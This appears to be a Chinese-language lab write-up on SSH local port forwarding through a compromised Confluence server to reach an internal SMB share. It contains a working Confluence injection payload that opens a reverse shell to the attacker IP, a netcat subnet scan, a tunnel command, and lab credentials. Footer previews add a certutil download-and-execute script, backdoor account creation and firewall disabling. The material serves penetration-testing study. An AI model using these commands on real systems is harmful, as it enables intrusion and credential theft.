SSH Tunneling - Local Port Forwarding

-

 SSH Tunneling - Local Port Forwarding


讓我們回想一下上一篇 Socat 場景中的第一個連接埠轉送範例。我們將 Socat 設定為偵聽 CONFLUENCE01 WAN 介面上的 TCP 連接埠 2345。在該連接埠上收到的封包被轉送到 PGDATABASE01 上的 TCP 連接埠 5432。我們使用它從 Kali 機器透過 CONFLUENCE01 連接到 PGDATABASE01 上的 PostgreSQL 服務。在這種情況下需要注意的關鍵一點是偵聽和轉送都是從同一台主機 (CONFLUENCE01) 完成的。


SSH 本地埠轉送對此新增了一個小改動。使用 SSH 本機連接埠轉發,封包不會由偵聽封包的相同主機轉送。相反,在兩個主機(SSH 用戶端和 SSH 伺服器)之間建立 SSH 連接, SSH 用戶端打開一個偵聽端口,並且在此端口上接收到的所有數據包都通過 SSH 連接通過隧道傳輸到SSH 伺服器。然後封包由 SSH 伺服器轉送到我們指定的套接字。


稍微修改一下先前的場景:Socat 現在在 CONFLUENCE01 上不再可用。我們仍然擁有之前從 Confluence 資料庫破解的所有憑證,並且仍然沒有防火牆阻止我們連接到 CONFLUENCE01 上綁定的連接埠。


使用database_admin憑證,我們將登入PGDATABASE01並發現它連接到另一個內部子網路。我們在該子網路中找到一台開啟了伺服器訊息區塊(SMB) 伺服器(在 TCP 連接埠 445 上)的主機。我們希望能夠連接到該伺服器並將我們找到的內容下載到我們的 Kali 機器上。


在這種類型的場景中,我們將計劃建立一個 SSH 本地連接埠轉發,作為從 CONFLUENCE01 到 PGDATABASE01 的 SSH 連接的一部分。我們將在CONFLUENCE01的WAN介面上綁定一個監聽埠。發送到該連接埠的所有封包都將透過 SSH 隧道轉送。然後,PGDATABASE01 會將這些封包轉送到我們找到的新主機上的 SMB 連接埠。




攻擊機 192.168.45.187

靶機 192.168.198.63、10.4.198.215、172.16.198.217


使用一樣的 Confluence 漏洞拿 Reverse Shell

curl -v http://192.168.198.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.187/4444%200%3E%261%27%29.start%28%29%22%29%7D/



4444 進來後 ip ro 看一下有另外一隻腳 ens224 10.4.198.63


先執行 python3 -c 'import pty; pty.spawn("/bin/bash")' 之後

ssh 到 DB Server 後 ip ro 確認有另外一隻腳 ens224 172.16.198.254




接著可以列舉一下 172.16.198.0/24 網段看哪一個 IP 有開 445 Port

指令 for i in $(seq 1 253); do nc -zv -w 1 172.16.198.$i 445; done

寫一個 Bash for 迴圈來掃描 /24 子網路上具有開放埠 445 的主機。使用 Netcat 建立連接

參數 -z 來檢查偵聽連接埠而不發送數

參數 -v 表示詳細程度

參數 -w 設定為 1 以確保較低的逾時閾值

可以看到 172.16.198.217 445 Port 有回應




接著我們將指示 SSH 偵聽 CONFLUENCE01 ( 0.0.0.0:4455 ) 上連接埠 4455 上的所有接口,然後將所有資料包(透過 SSH 隧道傳送至 PGDATABASE01)轉送至新找到的主機 ( 172.16.198.217 ) 上的445埠。

指令 ssh -N -L 0.0.0.0:4455:172.16.198.217:445 database_admin@10.4.198.215

輸入密碼後,我們不會收到任何輸出。當使用-N標誌運行 SSH 時,這是正常的。-N標誌阻止 SSH 執行任何遠端命令,這意味著我們只會收到與連接埠轉送相關的輸出




可以透過另外一個 Remote Shell 去確認 CONFLUENCE01 上的狀態






連接到 CONFLUENCE01 上的連接埠 4455 現在就像直接連接到 172.16.198.217 上的連接埠 445 一樣如下圖中的連結流程





之前找到的三個帳號密碼如下,這時候就可以拿來做 SMB 登入的使用測試

 - hr_admin : Welcome1234

 - rdp_admin : P@ssw0rd!

 - database_admin : sqlpass123

測試第一個即可 SMB 正常登入

指令 : smbclient -p 4455 -L //192.168.198.63/ -U hr_admin --password=Welcome1234

可以看到有個 Scripts 分享的資料夾




接著就是看看裡面的東西

smbclient -p 4455 //192.168.198.63/scripts -U hr_admin --password=Welcome1234

ls 後發現有個 Provisioning.ps1,那就直接 get 回來吧



接著就可以直接在 kali 上 cat ,拿到 flag 了






練習

靶機 192.168.198.63、10.4.198.215、172.16.198.217

先從 Web 下載指定的檔案 client_source.zip



同目錄下再抓 ssh_local_client

http://192.168.198.63:8090/exercises/ssh_local_client

解壓縮後將它們都放在一起





依照上面 一樣的步驟建好 SSH Tunneling

ssh -N -L 0.0.0.0:4242:172.16.198.217:4242 database_admin@10.4.198.215




將檔案改一下變成可執行




執行 └─$ ./ssh_local_client -p 4242 -i 192.168.198.63,就可以拿到 flag 了






留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容